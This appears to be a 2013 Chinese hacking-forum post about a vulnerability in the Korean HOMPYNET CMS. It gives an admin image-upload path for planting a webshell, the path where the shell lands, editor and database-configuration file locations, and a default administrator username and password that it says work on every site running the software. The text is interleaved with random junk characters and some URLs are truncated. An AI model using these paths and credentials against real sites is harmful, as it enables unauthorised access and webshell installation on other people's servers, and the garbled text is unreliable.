找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2723|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :
; P* ]$ y9 K6 V5 N! F
3 q/ L/ n$ a. x9 ^* xhttp://www.xxx.com/admin/image_a ... p;iname=&iform=  C& J: l5 b5 _0 l$ X
4 a" k. k9 O# b: l0 D
http://www.xxx.com/admin/image_a ... p;iname=&iform=% _$ E7 V& Y0 C& X* g* V

$ F; r8 A1 t4 R! r( `( Q上传后路径:
5 v8 E& l& v! u6 E! `' C
2 i) q- E9 E, s7 }# Ihttp://www.xxx.com/bis_web_page/images/shell.php.en
4 K! X  _# H) N5 U# x( M2 E. N$ V  g5 I; S. F
编辑器:
1 Q) z- D7 I% x! \1 g: n+ j* l4 q$ n7 [6 p, e- a% d9 h0 [# e2 ~9 j
http://www.xxx.com/admin/editor/SWE.php* T3 r7 H( S" _! ?% z# n: r- D
/ O7 D* S0 z* m' J  Y% c
http://www.xxx.com/program/editor/SWE.php: |0 ^' [) y% ?+ J8 P
% n0 h5 m9 D. W8 v0 p8 N  A
数据配置文件路径:
  X2 Q- h' q) z. I0 T' G6 m
# w7 K& A& Z7 }0 h8 Chttp://www.xxx.com/m_config/DATA/g_setting.php
/ d6 h: t/ S+ b6 v6 q8 D. {3 ^' F. H9 c' P% p, I
此程序通用后台账号 :gamsiw  php99* Z$ ?- ?( ?- X' }

8 ^2 M- T4 v3 I% r6 w4 o: r3 M/ V- z+ }; j+ Q8 e8 p

! ^* D: J7 s4 D" F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表